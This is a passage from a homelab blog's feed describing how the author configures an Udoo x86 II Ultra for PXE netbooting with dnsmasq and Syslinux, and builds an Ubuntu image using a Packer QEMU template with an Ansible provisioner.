and virtual machines over to a cluster of Pi CM4 modules. I&rsquo;ve been pretty
lucky in comparison to a lot of other members of the selfhosted community,
as I was able to gather all eight 8GB Pi CM4 modules I need to fill two
<a href="https://turingpi.com/">Turing Pi 2 cluster boards</a>. I will write about this soon.</p>
<p>And that&rsquo;s it. As I promised in the beginning, the next article will be an
overview of the software stack I&rsquo;m running, together with thoughts on
Linux distros I have been running over the years and an in-depth explanation of
my Vault/Consul/Nomad setup and the challenges of running those in a Homelab.
I might also cop to the reason I&rsquo;m not running Kubernetes. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Configuring an Udoo x86 II Ultra for Netbooting</title>
      <link>https://blog.mei-home.net/posts/udoo/</link>
      <pubDate>Thu, 29 Sep 2022 20:01:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/udoo/</guid>
      <description>Setup of an Udoo X86 II Ultra for PXE boot</description>
      <content:encoded><![CDATA[<p><img alt="A running Udoo X86 II Ultra" loading="lazy" src="/posts/udoo/images/udoo_deployed.JPG"></p>
<p>I&rsquo;m currently planning to switch my Homelab to a cluster of eight Raspberry Pi
CM4 modules with two <a href="https://www.kickstarter.com/projects/turingpi/turing-pi-cluster-board">Turing Pi 2 boards</a>.
That means a full switch to the aarch64/ARM processor architecture. But not all
software supports aarch64 yet. So I went looking for a small x86 machine which
doesn&rsquo;t cost too much, doesn&rsquo;t take too much space, and doesn&rsquo;t consume too much
power.</p>
<p>What I found was the <a href="https://shop.udoo.org/en/udoo-x86-ii-ultra.html">Udoo x86 II Ultra</a>.
Here are the base specs:</p>
<ul>
<li><em>CPU</em>: Intel Pentium N3710 2.56 GHz</li>
<li><em>RAM</em>: 8 GB DDR3 Dual Channel</li>
<li><em>Storage</em>: 32 GB eMMC</li>
</ul>
<p>The power is more than enough, as I don&rsquo;t expect to end up with too many x86-only
services (right now I&rsquo;m running over 20 jobs in my cluster, and none of them
is x86-only).</p>
<p>With an enclosure and a power brick, it cost me a total of 450 €. Could I have
built a cheaper machine from standard components? Possibly. But it would not
have been this small (13 cm x 9 cm x 3 cm) and would probably have drawn at least
a bit more power. With how little power it uses, it also runs perfectly fine when
passively cooled.</p>
<p>Here is a Grafana plot showing the CPU utilization and CPU frequency during
a <code>stress-ng -c 4</code> run. The small heat sink in the picture above was able to
sustain the full 2.56 GHz on all four cores for about 5 minutes before throttling
started.</p>
<p><img alt="Grafana plot showing CPU throttling starting around five minutes into a stress\nrun" loading="lazy" src="/posts/udoo/images/sobek_grafana_stress.png"></p>
<p>The storage does not play much of a role for me, as I planned to netboot it
anyway. This machine&rsquo;s only task is to serve as an x86 machine in my Nomad
cluster for those few services I would like to run which only support x86.</p>
<p>In the rest of this post, I will go a little bit into details on the netboot
and image creation for this machine. I only just finished <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">a series on netbooting
Raspberry Pis</a>, but this was a different
experience for two reasons: One, the Udoo supports full standard PXE boot, while
the Pi does a little bit of its own thing. Two, I had to redo my image setup,
because I used the <em>packer-builder-arm</em> Packer plugin for my Pi images.
For this new image, I now used the QEMU builder, which has an amusing (to me &#x1f609;)
way of running an OS installer (Ubuntu again).</p>
<h1 id="pxe-boot">PXE boot</h1>
<p>There is one major difference between the Pi netboot approach I have described
in a <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/#how-the-raspberry-pi-netboot-works">previous article</a>
and the standard PXE boot process.</p>
<p>Every PXE network boot process needs a Network Bootstrap Program. This program
serves as the bootloader for the system under netboot, similar to <em>grub</em> in
local boots. Grub itself can even be used as a Network Bootstrap Program. On
Raspberry Pis, that program is already present on the Pi itself, because Pis do
not follow a standard boot process and don&rsquo;t have BIOS or UEFI.</p>
<p>So with the Udoo, we need one additional step: Downloading the Network Bootstrap
Program. Once that Network Bootstrap Program is downloaded though, the boot
process for Raspberry Pis and the Udoo look exactly the same.</p>
<p>The NBP can be a variety of different programs. In my setup, I am using
<a href="https://wiki.syslinux.org">Syslinux</a>, or more precisely its <code>syslinux.efi</code> NBP.
Syslinux is part of a tandem of programs, with the other one being PXELinux.
They share similar configurations and behavior, and the main difference is that
<code>syslinux.efi</code> is for use with UEFI systems, while PXELinux is for use with BIOS systems.</p>
<p>To begin with, the network stack and netbooting needs to be enabled in the Udoo&rsquo;s
BIOS.</p>
<h2 id="preparing-the-netboot-server">Preparing the netboot server</h2>
<p>In addition, <code>syslinux</code> needs to be installed on the server providing TFTP. Once
it is installed, you need the following files in a directory where your TFTP
server can access them:</p>
<ul>
<li><code>syslinux.efi</code></li>
<li><code>ldlinux.e64</code></li>
</ul>
<p>Where exactly those files are found depends on the distribution/package. On
Ubuntu, they are found at <code>/usr/lib/syslinux/modules/efi64/ldlinux.e64</code> for the
<code>ldlinux.e64</code> and at <code>/usr/lib/SYSLINUX.EFI/efi64/syslinux.efi</code> for the <code>syslinux.efi</code>.
For my configuration, I just put those files into the root of my <code>/mnt/netboot</code>
NFS share.</p>
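<p>As a rough sketch of that preparation step (the package names are what I believe
to be the right ones on Ubuntu, and <code>/mnt/netboot</code> is simply my TFTP root), it
could look like this:</p>
<pre tabindex="0"><code># install the Syslinux EFI NBP and its modules
sudo apt install syslinux-efi syslinux-common

# copy the NBP and the matching ldlinux module into the TFTP root
sudo cp /usr/lib/SYSLINUX.EFI/efi64/syslinux.efi /mnt/netboot/
sudo cp /usr/lib/syslinux/modules/efi64/ldlinux.e64 /mnt/netboot/
</code></pre>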
<p>The netboot process, similar to Raspberry Pis, begins with a DHCP request. So
the first step is configuring the DHCP server for netbooting. This is described
in detail in my <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/#dnsmasq-and-tftp">Pi netboot server article</a>
and I will only describe the additions here.</p>
<p>The DNSmasq config from the Pi netboot article only needs to be extended by a
single line, but I will only show the file with the Syslinux options here:</p>
<pre tabindex="0"><code>port=0
dhcp-range=10.86.5.255,proxy
log-dhcp
enable-tftp
tftp-root=/mnt/netboot
pxe-service=X86-64_EFI,&#34;EFI Netboot&#34;,syslinux.efi
</code></pre><p>The <code>pxe-service</code> option has, as its first parameter, the client architecture.
In this case, <code>X86-64_EFI</code>, because the Udoo is a x86 machine with UEFI.</p>
<p>The third parameter provides the NBP file which will be offered to all clients
which contact this DHCP server with the <code>X86-64_EFI</code> client architecture.
The filepath is relative to the <code>tftp-root</code> directory.</p>
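<p>To sanity check this part in isolation, the NBP can be fetched manually with a
TFTP client from another host. This is just a quick test, assuming the tftp-hpa
client and with a placeholder for the netboot server&rsquo;s address:</p>
<pre tabindex="0"><code># should download syslinux.efi from the TFTP root into the current directory
tftp &lt;netboot server IP&gt; -c get syslinux.efi
ls -l syslinux.efi
</code></pre>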
<p>Now we are ready to prepare the configuration file. Basically the only thing
the PXE protocol says is how to get this NBP file via DHCP and TFTP. Everything
else is up to the NBP itself.</p>
<p>How Syslinux works is described in the <a href="https://wiki.syslinux.org/wiki/index.php?title=PXELINUX">official wiki</a>.
Don&rsquo;t worry about PXELinux here, both programs do almost the same things.</p>
<p>In principle, it works similarly to the Raspberry Pi netboot, with one difference:
Instead of looking for predetermined files in predetermined directories for
kernel, initrd and kernel command line, it only looks for a configuration file
in multiple different places and takes all options from that.</p>
<p>When looking for a config file, Syslinux will be looking in the following places:</p>
<ul>
<li><code>/mnt/netboot/pxelinux.cfg/&lt;Client machine id&gt;</code></li>
<li><code>/mnt/netboot/pxelinux.cfg/&lt;HWTYPE&gt;-&lt;HW ADDRESS&gt;</code></li>
<li><code>/mnt/netboot/pxelinux.cfg/&lt;IPv4 in HEX&gt;</code></li>
<li><code>/mnt/netboot/pxelinux.cfg/default</code></li>
</ul>
<p>Here, the <code>client machine id</code> is a unique machine identifier. I have not been
able to figure out how to determine that value when booted into a machine. I had
to take it from the DNSmasq logs showing the files requested by the client.</p>
<p>The <code>HWTYPE</code> is the ARP hwtype, e.g. <code>01</code> for ethernet, with the rest being
the MAC address of the NIC.</p>
<p>The last possibility is the IPv4 address of the host in hex notation. The IP
address can also be provided in a partial form.
For example, a host with the IP <code>10.0.0.1</code> would use a config file at
<code>pxelinux.cfg/0A000001</code>, but also <code>pxelinux.cfg/0A00</code>. This way, different boot
configs can be provided for different subnets.</p>
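<p>A quick way to produce that hex name for a given address is a little printf
one-liner; the IP here is just the example from above:</p>
<pre tabindex="0"><code># 10.0.0.1 -&gt; 0A000001
printf &#39;%02X%02X%02X%02X\n&#39; 10 0 0 1
</code></pre>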
<p>A Syslinux config file looks like this:</p>
<pre tabindex="0"><code>DEFAULT linux
LABEL linux
  KERNEL &lt;hostname&gt;/vmlinuz
  INITRD &lt;hostname&gt;/initrd.img
  APPEND boot=rbd rbdroot=10.0.0.1,10.0.0.2,10.0.0.3:clusteruser:&lt;ceph-key&gt;:pi-cluster:&lt;hostname&gt;::_netdev,noatime
</code></pre><p>These files are kept pretty simple. In my setup, the initrd and kernel image
are placed under a directory depending on the hostname, beneath the main netboot
directory configured as <code>tftp-root</code> in the DNSmasq config. So for example for a
host called sobek, the kernel would be placed at <code>/mnt/netboot/sobek/vmlinuz</code>.
The <code>APPEND</code> parameter contains the kernel command line parameters. So for my
Ceph RBD root device setup, that&rsquo;s the necessary options for mounting a RBD
volume.</p>
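<p>To make the layout a bit more concrete, this is roughly what my <code>/mnt/netboot</code>
directory ends up looking like for a host called sobek; the exact file names are
just my convention:</p>
<pre tabindex="0"><code>/mnt/netboot/
    syslinux.efi
    ldlinux.e64
    pxelinux.cfg/
        &lt;client machine id&gt;
    sobek/
        vmlinuz
        initrd.img
</code></pre>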
<p>So to recap, what happens during a boot of my Udoo:</p>
<ol>
<li>The host requests an IP address via DHCP, answered by my main firewall</li>
<li>The host requests netboot options, providing its unique client ID</li>
<li>My DNSmasq answers with itself as the TFTP server and the <code>syslinux.efi</code> file</li>
<li>The host downloads <code>syslinux.efi</code> via TFTP from my DNSmasq server and loads it</li>
<li>Syslinux checks for configuration files on the TFTP server</li>
<li>The only found config file, matching the unique client machine id of my Udoo,
is loaded by Syslinux</li>
<li>Syslinux loads the kernel from <code>hostname/vmlinuz</code> via TFTP</li>
<li>Syslinux loads <code>hostname/initrd</code> via TFTP and unpacks it</li>
</ol>
<p>After that sequence, the Kernel and initramfs take over, and the rest of
the boot follows the steps described in detail <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/">here</a>.</p>
<h2 id="preparing-an-ubuntu-image-for-a-generic-machine">Preparing an Ubuntu image for a generic machine</h2>
<p>In my <a href="https://blog.mei-home.net/posts/rpi-netboot/image/">previous article</a> I described
how to create an image for a Raspberry Pi 4. To do so, a special Packer builder
for ARM machines was used. This specific builder made use of the chroot command
instead of creating a full VM, and it used a preinstalled Ubuntu server image for
Raspberry Pis.</p>
<p>This time around, we&rsquo;re going to be using a different Packer builder, namely the
<a href="https://www.packer.io/plugins/builders/qemu">QEMU Builder</a>. The base approach
is still the same: Prepare the new machine, and then run a provisioner.
The provisioner has not changed at all here. It will be Ansible again, in fact
with the same playbook I used for the Pi setup previously.</p>
<p>The difference is how the image is built: Instead of just downloading a
preinstalled image, the QEMU builder will create a fresh disk and allow you to
mount an install medium.</p>
<p>And then we arrive at the really funny part: It can automate the installation,
even if that installation requires inputs. &#x1f605;</p>
<p>The Packer template file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_hostname&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Hostname for the machine which uses this image.&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_netboot&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">bool</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Should the host netboot or should it boot from a local disk?&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_host_id&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Host ID, e.g. HW ID for Pi or DHCP client-machine-id&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;foobar-pw&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/imhotep&#34;, &#34;pw&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;hn_ceph_key&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/ceph/users/picluster&#34;, &#34;key&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;qemu&#34; &#34;ubuntu-generic&#34;</span> {
</span></span><span style="display:flex;"><span>  iso_url           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://releases.ubuntu.com/22.04.1/ubuntu-22.04.1-live-server-amd64.iso&#34;</span>
</span></span><span style="display:flex;"><span>  iso_checksum      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256:10f19c5b2b8d6db711582e0e27f5116296c34fe4b313ba45f9b201a5007056cb&#34;</span>
</span></span><span style="display:flex;"><span>  output_directory  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;output_${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>  shutdown_command  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;echo &#39;packer&#39; | sudo -S shutdown -P now&#34;</span>
</span></span><span style="display:flex;"><span>  disk_size         <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;10G&#34;</span>
</span></span><span style="display:flex;"><span>  cpus              <span style="color:#f92672">=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>  memory            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4096&#34;</span>
</span></span><span style="display:flex;"><span>  format            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;raw&#34;</span>
</span></span><span style="display:flex;"><span>  accelerator       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;kvm&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_username      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_password      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_timeout       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;20m&#34;</span>
</span></span><span style="display:flex;"><span>  vm_name           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>  net_device        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio-net&#34;</span>
</span></span><span style="display:flex;"><span>  disk_interface    <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_handshake_attempts <span style="color:#f92672">=</span> <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>  http_content      <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;/user-data&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">templatefile</span>(<span style="color:#e6db74">&#34;${path.root}/files/ubuntu-metadata-template&#34;</span>,{
</span></span><span style="display:flex;"><span>      hn_hostname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>    })
</span></span><span style="display:flex;"><span>    &#34;/meta-data&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  boot_command <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;c&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;linux /casper/vmlinuz&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; autoinstall&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34; ds<span style="color:#f92672">=</span><span style="color:#66d9ef">nocloud</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">net</span><span style="color:#960050;background-color:#1e0010">&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34;\\;s<span style="color:#f92672">=</span><span style="color:#66d9ef">http</span><span style="color:#960050;background-color:#1e0010">://&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;{{.HTTPIP}}&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;:{{.HTTPPort}}/&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; ---&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;initrd /casper/initrd&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;boot&lt;enter&gt;&lt;wait&gt;&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.qemu.ubuntu-generic&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    user <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;foobar_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;ansible_become_password<span style="color:#f92672">=</span><span style="color:#66d9ef">ubuntu</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--become&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;-v&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    ansible_ssh_extra_args <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;-o IdentitiesOnly<span style="color:#f92672">=</span><span style="color:#66d9ef">yes</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34; -o HostkeyAlgorithms<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">rsa</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34; -o PubkeyAcceptedAlgorithms<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">rsa</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>    use_sftp <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h3 id="the-qemu-builder">The QEMU builder</h3>
<p>Let&rsquo;s start with the builder part of the template:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;qemu&#34; &#34;ubuntu-generic&#34;</span> {
</span></span><span style="display:flex;"><span>  iso_url           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://releases.ubuntu.com/22.04.1/ubuntu-22.04.1-live-server-amd64.iso&#34;</span>
</span></span><span style="display:flex;"><span>  iso_checksum      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256:10f19c5b2b8d6db711582e0e27f5116296c34fe4b313ba45f9b201a5007056cb&#34;</span>
</span></span><span style="display:flex;"><span>  output_directory  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;output_${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>  shutdown_command  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;echo &#39;packer&#39; | sudo -S shutdown -P now&#34;</span>
</span></span><span style="display:flex;"><span>  disk_size         <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;10G&#34;</span>
</span></span><span style="display:flex;"><span>  cpus              <span style="color:#f92672">=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>  memory            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4096&#34;</span>
</span></span><span style="display:flex;"><span>  format            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;raw&#34;</span>
</span></span><span style="display:flex;"><span>  accelerator       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;kvm&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_username      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_password      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_timeout       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;20m&#34;</span>
</span></span><span style="display:flex;"><span>  vm_name           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>  net_device        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio-net&#34;</span>
</span></span><span style="display:flex;"><span>  disk_interface    <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_handshake_attempts <span style="color:#f92672">=</span> <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>  http_content      <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;/user-data&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">templatefile</span>(<span style="color:#e6db74">&#34;${path.root}/files/ubuntu-metadata-template&#34;</span>,{
</span></span><span style="display:flex;"><span>      hn_hostname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>    })
</span></span><span style="display:flex;"><span>    &#34;/meta-data&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  boot_command <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;c&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;linux /casper/vmlinuz&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; autoinstall&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34; ds<span style="color:#f92672">=</span><span style="color:#66d9ef">nocloud</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">net</span><span style="color:#960050;background-color:#1e0010">&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34;\\;s<span style="color:#f92672">=</span><span style="color:#66d9ef">http</span><span style="color:#960050;background-color:#1e0010">://&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;{{.HTTPIP}}&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;:{{.HTTPPort}}/&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; ---&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;initrd /casper/initrd&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;boot&lt;enter&gt;&lt;wait&gt;&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The image being used here is Ubuntu&rsquo;s Server 22.04 install medium. It is
downloaded and mounted as a &ldquo;CD-ROM&rdquo; into the VM at boot. To automate the install
of Ubuntu, I&rsquo;m following <a href="https://ubuntu.com/server/docs/install/autoinstall-quickstart">these official instructions</a> to do a fully automated installation that does not ask any questions.</p>
<p>There are several steps necessary to achieve this:</p>
<ol>
<li>The boot medium kernel needs to be booted with specific parameters to enable
automatic install</li>
<li>A <em>cloud-init metadata file</em> needs to be provided. This file provides answers
to the questions which are normally asked interactively during an Ubuntu install</li>
</ol>
<p>Booting is the first hurdle, namely booting into the Ubuntu installer without
any manual intervention.</p>
<p>This is actually supported by Packer&rsquo;s QEMU builder, namely in the <code>boot_command</code>
option:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>  boot_command <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;c&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;linux /casper/vmlinuz&lt;wait&gt;&#34;</span>,
